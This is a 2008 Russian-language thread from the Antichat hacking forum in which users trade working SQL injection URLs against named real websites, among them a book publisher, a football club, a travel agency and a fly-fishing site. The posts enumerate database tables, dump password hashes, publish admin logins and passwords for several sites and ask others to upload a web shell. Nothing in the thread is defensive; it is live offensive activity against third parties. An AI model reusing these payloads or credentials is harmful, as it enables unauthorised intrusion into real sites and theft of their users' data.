ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6461  
Старый 26.08.2008, 21:13
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию

sabe, можеш пояснить, вот это "unhex(hex" ?

для чего это нужно?

и откуда ты получил вот эту таблицу?
" member_login_key"

Последний раз редактировалось SeNaP; 26.08.2008 в 21:40..
 
Ответить с цитированием

  #6462  
Старый 26.08.2008, 22:01
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

SeNaP
hex() - это конвертация стринга в хекс..
unhex() - обратная функция...
используем эту конструкцию вместе чтобы не было таких ошибок как у тебя

member_login_key - это стандартное поле где хранятся пассы от IPB

Последний раз редактировалось sabe; 26.08.2008 в 23:11..
 
Ответить с цитированием

  #6463  
Старый 26.08.2008, 23:24
Аватар для $p01nt
$p01nt
Участник форума
Регистрация: 19.02.2008
Сообщений: 186
Провел на форуме:
584540

Репутация: 96
По умолчанию

Все читают книжки? xD
Издательство "Эксмо"

http://www.eksmo.ru/catalog/book?b=1'

http://www.eksmo.ru/catalog/book?b=61308+union+select+1,2,3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5/*

4.0.21-standard-log

Издательство "Народное"

http://literati.ru/list4.php?rub=1'

http://literati.ru/list4.php?rub=-1+union+select+1,2,3,4/*

4.1.22-log

Последний раз редактировалось $p01nt; 26.08.2008 в 23:27..
 
Ответить с цитированием

Мой нормальный SQL-inJ =)
  #6464  
Старый 27.08.2008, 00:02
Аватар для SeNaP
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342

Репутация: 165
По умолчанию Мой нормальный SQL-inJ =)

А теперь после книжек идем на рыбалку
--------------
Базы ДанныХ
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,table_name,3+from+INFORMATION_SC HEMA.TABLES&limit=0
--------------
Таблицы в форуме
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,column_name,3+from+INFORMATION_S CHEMA.COLUMNS+where+table_name='phpbb_users'&limit =0
---------------
Юзеры форума
КЕШ(пароль не расшифрованный) = ЛОГИН
http://www.flyfishinginnh.com/news.php?id=-13+union+select+1,(concat_ws(0x3d,user_password,us ername)),3+from+phpbb_users&limit=0

----------------
Форум _http://www.flyfishinginnh.com/forum/
логин:admin
Пароль: 1 или brookie21
так как я по английскому не хрена не шарю
пороль 1 или brookie21
Логин: admin
-----------------
Кто сможет залить шел, отпишитесь пожалуйчто в ЛС
 
Ответить с цитированием

  #6465  
Старый 27.08.2008, 00:51
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

SeNaP
admin;brookie21

но форум не тот что ты указал это булка. у тебя хеш от phpbb ищи phpbb дам шелл нету phpbb ищи в базе поля от vb +))))))))
 
Ответить с цитированием

  #6466  
Старый 27.08.2008, 03:11
Аватар для USAkid
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию

Давайте посетим сайт футбольного клуба Анжи.
http://www.fc-anji.ru

Код:
http://www.fc-anji.ru/news.php?id=-341+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
version() - 4.1.22
user() - opendag@localhost
database() - wwwopendagru

Раскрытие пути:
/www/opendag/users/opendag-fcanji/www/htdocs/news.php

К information_schema и mysql.user доступа нету(
 
Ответить с цитированием

  #6467  
Старый 27.08.2008, 03:14
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от USAkid  
Давайте посетим сайт футбольного клуба Анжи.
http://www.fc-anji.ru

Код:
http://www.fc-anji.ru/news.php?id=-341+union+select+1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6/*
version() - 4.1.22
user() - opendag@localhost
database() - wwwopendagru

Раскрытие пути:
/www/opendag/users/opendag-fcanji/www/htdocs/news.php

К information_schema и mysql.user доступа нету(
конечно к information_schema доступа не будет.. этож 4 версия.. там его просто нет=)
 
Ответить с цитированием

  #6468  
Старый 27.08.2008, 07:41
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://www.nord-east.ru/index.php?id=-1111+union+select+1,table_name,3,4+from+informatio n_schema.tables+limit+0,1--
Строительная компания какая-то -)
только в табличках нифига толкового нету.
 
Ответить с цитированием

  #6469  
Старый 27.08.2008, 09:02
Аватар для USAkid
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию

Турфирма Эл ь ф-СПб
http://www.bustur.ru


Код:
http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,concat_ws(version(),0x3a,user(),0x3a,database())--
version() - 5.1.19-beta
user() - petrotour@localhost
database() - petrotour

Есть контакт! Пошли таблички:

Код:
http://www.bustur.ru/t.php?id=-1+union+select+1,2,3,table_name+from+information_schema.tables--
----------------------------------------------------------------

http://santechmart.ru
Код:
http://santechmart.ru/print.php?id=-1+union+select+concat_ws(version(),0x3a,user(),0x3a,database())--
version() - 5.0.41-log
user() - santechmartru@troy.mplik.ru
database() - santechmartru

Табличке:

Код:
http://santechmart.ru/print.php?id=-1+union+select+table_name+from+information_schema.tables+limit+1,1--
Перебирать по: 2,1 ; 3,1 ; 4,1 и т.д.

Последний раз редактировалось USAkid; 27.08.2008 в 09:23..
 
Ответить с цитированием

  #6470  
Старый 27.08.2008, 11:10
Аватар для luz3r
luz3r
Banned
Регистрация: 23.02.2008
Сообщений: 268
Провел на форуме:
3103600

Репутация: 850
По умолчанию

http://www.pc-olymp.ru/gymnastik/index.php3?page=-1+union+select+concat(login,0x3a3a,pwd),2,3,4+from %20+users+limit+0,10/*

админка http://www.pc-olymp.ru/admin/
пароль и пасс
admin;admin
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ